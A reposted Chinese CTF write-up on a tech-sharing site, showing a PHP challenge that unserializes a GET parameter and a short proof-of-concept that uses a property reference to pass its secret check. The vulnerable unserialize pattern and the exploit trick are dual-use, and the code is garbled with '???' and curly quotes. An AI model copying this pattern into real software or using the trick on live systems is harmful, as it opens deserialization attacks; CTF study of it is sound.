分享web开发知识

注册/登录|最近发布|今日推荐

主页 IT知识网页技术软件开发前端开发代码编程运营维护技术分享教程案例
当前位置:首页 > 技术分享

南邮PHP反序列化

发布时间:2023-09-06 02:08责任编辑:郭大石关键词:PHP

题目如下:

<?phpclass just4fun { ???var $enter; ???var $secret;}if (isset($_GET[‘pass‘])) { ???$pass = $_GET[‘pass‘]; ???if(get_magic_quotes_gpc()){ ???????$pass=stripslashes($pass); ???} ???$o = unserialize($pass); ???if ($o) { ???????$o->secret = "*"; ???????if ($o->secret === $o->enter) ???????????echo "Congratulation! Here is my secret: ".$o->secret; ???????else ????????????echo "Oh no... You can‘t fool me"; ???} ???else echo "are you trolling?";}?>

主要是涉及了一个PHP对象深浅拷贝,文章:

直接构造POC:

<?php class just4fun{ ???var $enter; ???var $secret; ???????function __construct() ???{ ???????$this->enter=&$this->secret; ???}}echo serialize(new just4fun()); ?>

南邮PHP反序列化

原文地址:https://www.cnblogs.com/nul1/p/9417484.html

知识推荐

我的编程学习网——分享web前端后端开发技术知识。 垃圾信息处理邮箱 tousu563@163.com 网站地图
icp备案号 闽ICP备2023006418号-8 不良信息举报平台 互联网安全管理备案 Copyright 2023 www.wodecom.cn All Rights Reserved